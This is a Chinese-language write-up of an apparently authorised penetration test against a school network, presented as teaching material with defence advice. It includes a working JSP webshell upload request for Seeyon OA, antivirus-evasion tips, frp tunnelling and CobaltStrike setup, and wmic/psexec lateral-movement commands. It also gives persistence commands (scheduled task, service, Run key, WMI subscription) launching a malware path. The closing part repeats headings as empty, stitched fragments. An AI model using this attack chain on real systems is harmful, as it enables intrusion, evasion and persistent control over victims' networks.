某学校授权渗透测试评估技术分析与教学文档<\/h1>

渗透测试概述<\/h2>
本次渗透测试针对某学校系统进行授权安全评估，通过外网和内网多阶段渗透，成功获取了系统权限和敏感信息。测试过程展示了从外网突破到内网横向移动的完整攻击链。<\/p>

外网渗透阶段<\/h2>

1. 协同管理平台文件上传漏洞利用<\/h3>

漏洞描述<\/strong>：
发现协同管理平台存在文件上传漏洞，攻击者可通过此漏洞上传恶意文件获取Web服务器权限。<\/p>

利用方法<\/strong>：<\/p>

通过常规文件上传功能或接口上传Webshell<\/li>
使用Burp Suite等工具拦截上传请求，修改文件类型和内容<\/li>
常见上传绕过技术：

修改Content-Type为合法类型(image\/jpeg等)<\/li>
双写后缀(.php.jpg)<\/li>
大小写混淆(.PhP)<\/li>
空字符截断(%00)<\/li>
.htaccess文件上传<\/li> <\/ul> <\/li> <\/ul>
修复建议<\/strong>：<\/p>

严格校验文件类型和内容<\/li>
限制上传目录执行权限<\/li>
使用随机文件名并存储在非Web目录<\/li>
实施文件内容检测<\/li> <\/ul>
2. 致远OA ajax.do任意文件上传漏洞<\/h3>
漏洞描述<\/strong>：
致远OA系统的ajax.do接口存在任意文件上传漏洞(CVE-2017-10201)，攻击者可上传jsp木马获取服务器权限。<\/p>
利用步骤<\/strong>：<\/p>

构造POST请求到\/seeyon\/ajax.do<\/code><\/li>
上传包含恶意代码的jsp文件<\/li>
访问上传的jsp文件执行命令<\/li> <\/ol> POC示例<\/strong>：<\/p> POST<\/span> \/seeyon\/ajax.do?method=ajaxAction&managerName=formulaManager HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundary9Pgg3MUhNO2Q0NQz<\/span> <\/span><\/span> <\/span><\/span>------WebKitFormBoundary9Pgg3MUhNO2Q0NQz <\/span><\/span>Content-Disposition: form-data; name="field1" <\/span><\/span> <\/span><\/span>test <\/span><\/span>------WebKitFormBoundary9Pgg3MUhNO2Q0NQz <\/span><\/span>Content-Disposition: form-data; name="file"; filename="test.jsp" <\/span><\/span>Content-Type: application\/octet-stream <\/span><\/span> <\/span><\/span><%@page import="java.util.*,java.io.*"%> <\/span><\/span><% <\/span><\/span>if (request.getParameter("cmd") != null) { <\/span><\/span> out.println("Command: " + request.getParameter("cmd") + "<BR>"); <\/span><\/span> Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); <\/span><\/span> OutputStream os = p.getOutputStream(); <\/span><\/span> InputStream in = p.getInputStream(); <\/span><\/span> DataInputStream dis = new DataInputStream(in); <\/span><\/span> String disr = dis.readLine(); <\/span><\/span> while ( disr != null ) { <\/span><\/span> out.println(disr); <\/span><\/span> disr = dis.readLine(); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>%> <\/span><\/span>------WebKitFormBoundary9Pgg3MUhNO2Q0NQz-- <\/span><\/span><\/code><\/pre>修复建议<\/strong>：<\/p> 升级致远OA到最新版本<\/li> 禁用不必要的ajax接口<\/li> 实施严格的输入验证<\/li> <\/ul> 3. 致远A8数据库密码解密<\/h3> 漏洞描述<\/strong>：获取了致远A8系统的数据库配置文件，发现数据库密码使用弱加密方式存储，可被轻易解密。<\/p> 解密方法<\/strong>：<\/p> 定位数据库配置文件(通常为WEB-INF\/classes\/conf\/database.properties)<\/li> 提取加密后的密码字符串<\/li> 使用致远OA专用解密工具或脚本解密<\/li> <\/ol> 修复建议<\/strong>：<\/p> 使用强加密算法存储密码<\/li> 定期更换数据库密码<\/li> 限制数据库远程访问<\/li> <\/ul> 内网渗透阶段<\/h2> 1. 内网突破技术<\/h3> 攻击手段<\/strong>：<\/p> 向日葵远控软件绕过360<\/strong>：利用向日葵远程控制软件的内置功能绕过杀毒软件检测<\/li> gotohttp远程控制<\/strong>：使用轻量级远程控制工具gotohttp建立持久化控制<\/li> frp内网穿透<\/strong>：配置frp服务实现内网端口映射到外网<\/li> Proxifier代理<\/strong>：通过Proxifier配置全局代理，实现所有应用的流量转发<\/li> <\/ul> 技术细节<\/strong>：<\/p> 向日葵绕过<\/strong>：<\/p> 使用向日葵的"隐私模式"或"游戏模式"<\/li> 修改客户端特征码避免检测<\/li> 利用白名单机制绕过杀软<\/li> <\/ul> <\/li> gotohttp使用<\/strong>：<\/p> # 客户端连接命令<\/span> <\/span><\/span>gotohttp -id [<\/span>设备ID]<\/span> -secret [<\/span>密钥]<\/span> <\/span><\/span><\/code><\/pre><\/li> frp配置<\/strong>：<\/p> # frps.ini (服务端)<\/span> <\/span><\/span>[common]<\/span> <\/span><\/span>bind_port<\/span> =<\/span> 7000<\/span> <\/span><\/span> <\/span><\/span># frpc.ini (客户端)<\/span> <\/span><\/span>[common]<\/span> <\/span><\/span>server_addr<\/span> =<\/span> x.x.x.x<\/span> <\/span><\/span>server_port<\/span> =<\/span> 7000<\/span> <\/span><\/span> <\/span><\/span>[ssh]<\/span> <\/span><\/span>type<\/span> =<\/span> tcp<\/span> <\/span><\/span>local_ip<\/span> =<\/span> 127.0.0.1<\/span> <\/span><\/span>local_port<\/span> =<\/span> 22<\/span> <\/span><\/span>remote_port<\/span> =<\/span> 6000<\/span> <\/span><\/span><\/code><\/pre><\/li> Proxifier配置<\/strong>：<\/p> 创建代理服务器配置<\/li> 设置代理规则将所有流量转发到指定端口<\/li> 可配合Socks代理工具如EarthWorm使用<\/li> <\/ul> <\/li> <\/ol> 2. 内网扫描与漏洞利用<\/h3> 使用工具<\/strong>：<\/p> fscan64<\/strong>：高效内网扫描工具，可检测弱口令、常见漏洞等<\/li> CobaltStrike<\/strong>：高级渗透测试框架，用于横向移动和权限维持<\/li> <\/ul> 扫描命令示例<\/strong>：<\/p> # fscan64基本扫描<\/span> <\/span><\/span>fscan64 -h 192.168.12.1\/24 <\/span><\/span> <\/span><\/span># 指定扫描模块<\/span> <\/span><\/span>fscan64 -h 192.168.12.1\/24 -m ssh,smb,ms17010 <\/span><\/span> <\/span><\/span># CobaltStrike团队服务器启动<\/span> <\/span><\/span>.\/teamserver [<\/span>IP]<\/span> [<\/span>密码]<\/span> <\/span><\/span><\/code><\/pre>常见内网攻击手法<\/strong>：<\/p> 弱口令爆破<\/strong>：<\/p> SMB\/RDP\/SSH\/FTP等服务的弱口令<\/li> 使用字典攻击或密码喷洒技术<\/li> <\/ul> <\/li> Nday\/1day漏洞利用<\/strong>：<\/p> MS17-010 (永恒之蓝)<\/li> CVE-2020-0796 (SMBGhost)<\/li> CVE-2021-26855 (Exchange SSRF)<\/li> 最新公开的漏洞利用<\/li> <\/ul> <\/li> 敏感信息收集<\/strong>：<\/p> 共享文件夹扫描<\/li> 配置文件泄露<\/li> 浏览器密码提取<\/li> 内存密码抓取<\/li> <\/ul> <\/li> <\/ol> 3. 横向移动技术<\/h3> 技术手段<\/strong>：<\/p> 凭证传递攻击<\/strong>：<\/p> Pass-the-Hash (PtH)<\/li> Pass-the-Ticket (PtT)<\/li> Overpass-the-Hash<\/li> <\/ul> <\/li> 远程命令执行<\/strong>：<\/p> # WMI执行<\/span> <\/span><\/span>wmic \/node:192.168.12.16 \/user:admin \/password:pass process call create "cmd.exe \/c whoami"<\/span> <\/span><\/span> <\/span><\/span># PsExec<\/span> <\/span><\/span>psexec \\<\/span>192.168.12.16 -u admin -p pass cmd.exe <\/span><\/span><\/code><\/pre><\/li> CobaltStrike横向移动<\/strong>：<\/p> 使用已控主机作为跳板<\/li> 派生会话到新目标<\/li> 通过SSH或SMB横向扩展<\/li> <\/ul> <\/li> <\/ol> 4. 权限维持技术<\/h3> 持久化方法<\/strong>：<\/p> 计划任务<\/strong>：<\/p> schtasks \/create \/tn "Update"<\/span> \/tr "C:\malware.exe"<\/span> \/sc minute \/mo 30<\/span> \/ru SYSTEM <\/span><\/span><\/code><\/pre><\/li> 服务创建<\/strong>：<\/p> sc \\<\/span>192.168.12.16 create "Backup"<\/span> binpath=<\/span> "C:\malware.exe"<\/span> start=<\/span> auto <\/span><\/span><\/code><\/pre><\/li> 注册表自启动<\/strong>：<\/p> reg add HKLM\S<\/span>OFTWARE\M<\/span>icrosoft\W<\/span>indows\C<\/span>urrentVersion\R<\/span>un \/v "Updater"<\/span> \/t REG_SZ \/d "C:\malware.exe"<\/span> <\/span><\/span><\/code><\/pre><\/li> WMI事件订阅<\/strong>：<\/p> $filterArgs = @{name='Updater'<\/span>; EventNameSpace='root\cimv2'<\/span>; QueryLanguage="WQL"<\/span>; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"<\/span>} <\/span><\/span>$filter = Set-WmiInstance -Namespace root\/subscription -Class __EventFilter -Arguments $filterArgs <\/span><\/span> <\/span><\/span>$consumerArgs = @{name='Updater'<\/span>; CommandLineTemplate="C:\malware.exe"<\/span>} <\/span><\/span>$consumer = Set-WmiInstance -Namespace root\/subscription -Class CommandLineEventConsumer -Arguments $consumerArgs <\/span><\/span> <\/span><\/span>$bindingArgs = @{Filter<\/span>=$filter; Consumer=$consumer} <\/span><\/span>$binding = Set-WmiInstance -Namespace root\/subscription -Class __FilterToConsumerBinding -Arguments $bindingArgs <\/span><\/span><\/code><\/pre><\/li> <\/ol> 渗透测试建议与防御措施<\/h2> 1. 外网防御建议<\/h3> 定期更新所有对外服务组件和框架<\/li> 实施严格的输入验证和过滤<\/li> 禁用不必要的服务和接口<\/li> 配置WAF防护常见Web攻击<\/li> 实施文件上传安全策略<\/li> <\/ul> 2. 内网防御建议<\/h3> 网络分段<\/strong>：<\/p> 按照业务功能划分VLAN<\/li> 实施严格的ACL策略<\/li> 关键系统隔离保护<\/li> <\/ul> <\/li> 终端防护<\/strong>：<\/p> 部署EDR解决方案<\/li> 限制管理员权限<\/li> 禁用不必要的协议和服务<\/li> <\/ul> <\/li> 监控与响应<\/strong>：<\/p> 部署SIEM系统集中分析日志<\/li> 配置异常行为告警<\/li> 建立应急响应流程<\/li> <\/ul> <\/li> 身份认证加固<\/strong>：<\/p> 实施多因素认证<\/li> 定期更换密码<\/li> 禁用默认账户和弱密码<\/li> <\/ul> <\/li> 横向移动防护<\/strong>：<\/p> 限制SMB\/RDP\/WMI等协议的访问<\/li> 监控异常登录行为<\/li> 实施最小权限原则<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 本次渗透测试展示了从外网Web漏洞到内网全面沦陷的完整攻击路径，强调了网络安全防御需要多层次、全方位的防护措施。学校等教育机构信息系统往往存在重功能轻安全的问题，需要加强安全意识培训和技术防护能力建设。<\/p> 渗透测试的关键在于：<\/p> 外网寻找薄弱入口点<\/li> 内网快速信息收集和定位关键系统<\/li> 使用自动化工具提高效率<\/li> 多种横向移动技术组合使用<\/li> 建立持久化控制通道<\/li> <\/ol> 防御方应从攻击者视角审视自身系统，定期进行安全评估和加固，才能有效防范此类攻击。<\/p>

某学校授权渗透测试评估技术分析与教学文档<\/h1>

渗透测试概述<\/h2> 本次渗透测试针对某学校系统进行授权安全评估，通过外网和内网多阶段渗透，成功获取了系统权限和敏感信息。测试过程展示了从外网突破到内网横向移动的完整攻击链。<\/p>

外网渗透阶段<\/h2>

内网渗透阶段<\/h2>

渗透测试建议与防御措施<\/h2>

渗透测试概述<\/h2>
本次渗透测试针对某学校系统进行授权安全评估，通过外网和内网多阶段渗透，成功获取了系统权限和敏感信息。测试过程展示了从外网突破到内网横向移动的完整攻击链。<\/p>